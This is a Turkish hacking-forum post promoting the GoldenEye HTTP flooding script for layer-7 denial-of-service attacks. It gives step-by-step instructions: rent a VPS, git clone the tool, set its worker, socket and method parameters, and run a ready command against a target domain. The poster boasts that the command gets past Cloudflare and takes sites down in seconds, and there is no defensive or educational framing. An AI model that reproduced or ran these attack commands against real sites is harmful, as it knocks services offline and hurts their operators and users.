• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Golden Eye DDos Script

Ü

Üye silindi 146

Selamlar kardeşlerim abilerim biladerlerim nasılsınız iysiniz umarım...

Başlıktan da anlaşılacağı üzere bu konumda sizlere kullanımı çok basit bir ddos scriptini tanıtacağım aranızda bilenleriniz de vardır mutlaka troll:

Öyle çok ahım şahım bir script değil layer 7 saldırıları yapabiliyorsunuz güçlü sunucularla düşüremeyeceği site yok diyebilirim. neyse moruk kullanımına geçelim.

Öncelikle 1 adet vps sunucunuzu hazırlıyorsunuz. Bu tür küçük saldırılar için Digital Ocean işinizi görür tavsiye ederim. Herneyse öncelikle sunucuya Scriptimizi çekelim.


git clone https://github.com/jseidl/GoldenEye.git

120

Sunucumuza dosyamızı başarılı bir şekilde çektik şimdi cd GoldenEye yazıp klasörün içersine giriyoruz.

121



Şimdii Scriptin kullanımı için bazı parametreler mevcut onları altta vericem hedefe göre ayarlarsınız.

Parametreler aşağıdaki gibidir

Kod:
-w, --workers: Eş zamanlı yapılan Process(çalışan sayısı) (Örnek: -w 100)
-s, --sockets: Eş zamanlı test edilecek Sockets sayısı. (Örnek: -s 100)
-m, --method: HTTP saldırı yöntemleri (get,post,random) (Örnek: -m get)
-d, --debug : Hata ayıklama modu etkinleştirmek içindir.


Daha fazla boş yapmadan scripti çalıştırayım Zaaa:


python goldeneye.py komutu ile çalıştırabilirsiniz ama size vereceğim hazır komut ile daha kesin sonuçlar alacaksınız komuttaki domain kısmına hedefinkini yazıp yapıştırın mk cf falan dinlemez deler geçer valla.


python goldeneye.py http://www.hedefsite.com/ -w 100 -s 5000 -m post -d

örnek test sonuçları ( 0.1 saniye içersinde uçtu )



niye konuyu bu kadar uzattın diyenler için;

122


 
Üst